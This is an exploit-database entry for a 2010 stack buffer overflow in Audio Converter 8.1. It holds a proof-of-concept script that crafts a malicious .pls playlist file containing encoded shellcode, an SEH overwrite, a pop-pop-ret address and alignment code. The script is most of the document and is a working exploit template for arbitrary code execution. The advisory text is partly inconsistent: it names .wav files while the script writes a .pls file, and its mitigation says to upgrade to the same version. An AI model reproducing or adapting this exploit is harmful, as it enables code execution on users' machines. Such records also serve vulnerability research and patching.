Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit

vendor:

Audio Converter 8.1

by:

Sud0

7,8

CVSS

HIGH

SEH

119

CWE

Product Name: Audio Converter 8.1

Affected Version From: 8.1

Affected Version To: 8.1

Patch Exists: YES

Related CWE: N/A

CPE: a:audio_converter:audio_converter_8.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit

Audio Converter 8.1 is vulnerable to a stack buffer overflow vulnerability. This vulnerability can be exploited by an attacker to execute arbitrary code on the target system. The vulnerability is caused due to a boundary error when handling specially crafted .wav files. This can be exploited to cause a stack-based buffer overflow via a specially crafted .wav file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Audio Converter 8.1

Source

Exploit-DB raw data:

#***********************************************************************************
# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit
# Date          : 16/05/2010
# Author        : Sud0
# Bug found by  : chap0
# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
# Version       : 8.1
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Thanks to my wife for her support
# Thanks for chap0 for bringing us the game
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code. 
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
print "|------------------------------------------------------------------|\n";
print "|                         __               __                      |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for .... \n";

import socket
#shellcode running calc.exe alpha2 encoded basereg edx
shell="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA"  
junk="B" * (4432 - len(shell))  #seh overwritten after 4432 bytes
nseh= "\xEB\x06\xEB\x06" # jmp forward 
seh= "\xF1\x8E\x03\x10" # nice ppr from audioconv
align="\x61\x61\x61\xff\xE2" # popad / popad / popad / jmp edx
buffer= shell + junk + nseh + seh + "\x90" * 20 + align  + "A"* 10000#  added some nops after seh
 
mefile = open('poc.pls','w');
mefile.write(buffer);
mefile.close()